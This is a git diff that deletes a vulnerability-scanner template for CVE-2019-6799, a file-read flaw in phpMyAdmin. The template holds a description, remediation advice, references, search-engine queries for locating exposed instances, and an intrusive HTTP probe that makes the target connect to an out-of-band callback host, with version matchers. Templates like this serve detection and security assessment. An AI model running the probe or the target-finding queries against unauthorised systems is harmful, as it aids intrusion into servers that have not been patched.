diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml deleted file mode 100644 index d0c051afd2..0000000000 --- a/http/cves/2019/CVE-2019-6799.yaml +++ /dev/null @@ -1,106 +0,0 @@ -id: CVE-2019-6799 - -info: - name: phpMyAdmin <4.8.5 - Local File Inclusion - author: pwnhxl - severity: medium - description: | - phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. - remediation: | - Upgrade phpMyAdmin to version 4.8.5 or later to mitigate this vulnerability. - reference: - - https://paper.seebug.org/1112/#_4 - - https://github.com/phpmyadmin/phpmyadmin/commit/828f740158e7bf14aa4a7473c5968d06364e03a2 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6799 - - https://github.com/rmb122/rogue_mysql_server - - https://github.com/vulnspy/phpmyadmin-4.8.4-allowarbitraryserver - - https://nvd.nist.gov/vuln/detail/CVE-2019-6799 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.9 - cve-id: CVE-2019-6799 - epss-score: 0.13969 - epss-percentile: 0.95141 - cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 6 - vendor: phpmyadmin - product: phpmyadmin - shodan-query: title:"phpmyadmin" - fofa-query: body="pma_servername" && body="4.8.4" - hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" - tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive - -http: - - raw: - - | - GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1 - Host: {{Hostname}} - - payloads: - path: - - /index.php - - /pma/index.php - - /pmd/index.php - - /phpMyAdmin/index.php - - /phpmyadmin/index.php - - /_phpmyadmin/index.php - - attack: batteringram - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: dsl - dsl: - - compare_versions(version, '< 4.8.5') - - - type: dsl - dsl: - - compare_versions(version, '> 3.9.9') - - - type: dsl - dsl: - - compare_versions(phpversion, '< 7.3.4') - - - type: word - part: interactsh_protocol - words: - - dns - - - type: word - words: - - mysqli_real_connect - - - type: word - words: - - pma_servername - - - type: status - status: - - 200 - - extractors: - - type: regex - name: version - group: 1 - regex: - - \?v=([0-9.]+) - internal: true - - - type: regex - group: 1 - regex: - - \?v=([0-9.]+) - - - type: regex - name: phpversion - group: 1 - regex: - - "X-Powered-By: PHP/([0-9.]+)" - internal: true - part: header -# digest: 490a0046304402200a01f97dacfb787968fb2a8f0e996927ce60ce4f802b7e245b61f8401e34de90022064a008fdb8bf243117f0774545b79488f4e514889c23111b2660235d910a19ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file